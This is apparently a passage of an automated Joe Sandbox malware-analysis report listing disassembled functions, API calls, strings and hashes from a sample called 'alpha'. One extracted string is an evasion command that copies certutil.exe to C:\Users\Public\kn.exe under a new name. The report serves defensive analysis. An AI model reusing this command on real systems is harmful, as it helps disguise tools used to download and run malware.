                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f588b637ceb8584a5a3c843e496a3cb18b48463ca98d7947242cb60a69081c6b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AA1D022B08A1B86FB54AB61E8542BCFBA1FB49B55FC54036CE0F47764DFBCA445C620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1511560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 628682198-4282027825
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b25b808e516c358bce672ae322bfb53b11f1219dd7a2ddbc605b2fc6e1c8f426
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CE1AF62A0868B96FB65AB20D8902FDB7A0EB44745FC14176D90F477A4EFBCD585C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 16309207-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 785f778e141e23ff6b32bc17f5f1bdbde7ceb6fdbc0556196f796a001e09b3df
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30228D62B08B8A86FF65AF20D8542ADA3A0FF45784FC04136DA1F4BBA5DFBCD1458310
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3863671652-4137775220
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e4d6ba0fa3cafe51f3213b76184d45e25dcbcfeb1aafedf8ce0c29b5d28044eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE1BB22E0964B86FB62BB15A45837CB6A0AF45740FD64137E91F422B1DFBDE881C730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1513410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3538039442-1881496484
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d0047dc12a25b682a98fc362789cc67f4cd4fa2c651befc5630ce6baa8eadb6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA51BB72A08B4A82FB61AB15B45467EFAA1FB89B44FC58136DA8F03764DFBCD444C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D153048E), ref: 00007FF7D153DA58
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D153DAD6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D153DAFC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D153DB22
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1515194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7D15151C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: FindFirstFileExW.KERNELBASE ref: 00007FF7D1528280
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D152829D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1514FE8: _get_osfhandle.MSVCRT ref: 00007FF7D1515012
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1514FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515030
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153DDB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15159E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515A2E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15159E4: _open_osfhandle.MSVCRT ref: 00007FF7D1515A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D153DDEB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153DDFA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E204
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E223
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E242
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d$%s$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3651208239-912394897
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 419af2923438f2799513d7d2ea363a3558cc2888e4afdcb144672576e08960f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1427032A0868B8AF764AF21D8502EDB7A1FB45744FD00037E64F47AA9DFBDE5548720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: COPYCMD$\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3989487059-1802776761
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 556f273b68658bad24ae4a657d5f77560e51f276d87fecf3366158a32f470c82
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89F1B266A09B4B81FB55AB11D4542BEB3A0FF45B98FC44036DA4F477B4EEBCE4858320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 55602301-2548490036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 762cd0ca4af20a1155187169e38170c917da472260c7888e906569873f87654f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AA17F23A1864B96FB20AB10E4402BEA7A1FB44754FD40177EA4F876A4EFBCE555C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1541538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3935429995-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 60eb9cf78ec16cf5d17a62547b0ee6ddbe12d59b712973661313cdc7ab558411
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8761BD26A0866B82F750EB21A44457DFBA0FB89F94FE58132DE4B437A0DFBCE4018710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15135B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
